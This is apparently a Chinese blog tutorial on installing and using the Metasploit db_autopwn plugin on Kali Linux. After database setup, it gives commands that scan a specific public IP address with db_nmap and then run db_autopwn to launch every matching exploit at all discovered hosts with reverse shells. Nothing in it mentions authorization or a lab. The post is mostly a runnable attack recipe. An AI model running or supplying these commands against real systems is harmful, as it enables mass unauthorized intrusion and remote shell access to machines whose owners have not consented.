zoukankan      html  css  js  c++  java
  • Metasploit自动攻击模块

    Metasploit自动攻击模块

    Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
    
    
    
    wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb
    mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
    ls -alh /usr/share/metasploit-framework/plugins/
    
    db_status
    db_disconnect
    db_status
    db_connect msf3:msf3@127.0.0.1/msf3
    db_status
    
    workspace
    workspace -a test1
    workspace
    workspace test1
    
    db_nmap -sV -O -v -T 5 202.193.58.13
    hosts
    services
    
    load db_autopwn
    help db_autopwn
    db_autopwn -e -t -r -p

    环境:kali-linux-2017.3-vm-amd64

    一、安装postgresql数据库

    apt-get install postgresql

    apt-get install rubygems libpq-dev

    apt-get install libreadline-dev

    apt-get install libssl-dev

    apt-get install libpq5

    apt-get install ruby-dev

    apt-get install libpq-dev

    直接全部copy到kali中执行即可

    二、自动配置数据库

    service postgres start           启动服务

    msfdb init                           自动创建数据库、用户、密码

     

    三、手动配置数据库

    passwd postgres 修改postgresql数据库密码

     

    su postgres    进入数据库

    createuser hello –P       创建用户hello,并设置密码

    createdb --owner=hello db_hello      给用户hello创建一个数据库db_hello

    psql db_hello        进入db_hello数据库

     

    四、安装db_autopwn.rb模块

    cd /usr/share/metasploit-framework/plugins   定位到msf插件目录

    git clone https://github.com/hahwul/metasploit-db_autopwn.git  安装db_autopwn

     

    cd metasploit-db_autopwn

    mv db_autopwn.rb /usr/share/metasploit-framework/plugins

    打开msfconsole,查看db_autopwn是否安装成功,执行如下命令:

    load db_autopwn         出现下图结果说明安装成功

     

    五、借助db_autopwn进行自动加载模块进行攻击

    msfconsole

    use auxiliary/scanner/portscan/tcp     调用tcp扫描模块

    set rhosts 192.168.1.28

    set threads 10

    exploit

     

    自动加载模块

    db_autopwn –t –p –r –e

     

  • 相关阅读:
    KKT条件原理
    拉格朗日乘子法
    Java volatile详解
    Java重排序
    Java Socket NIO入门
    Java Socket入门
    TCP三次握手,四次挥手
    Java NIO详解
    cobbler批量安装系统
    nginx详解反向代理,负载均衡,LNMP架构上线动态网站
  • 原文地址:https://www.cnblogs.com/lsgxeva/p/8450200.html
Copyright © 2011-2022 走看看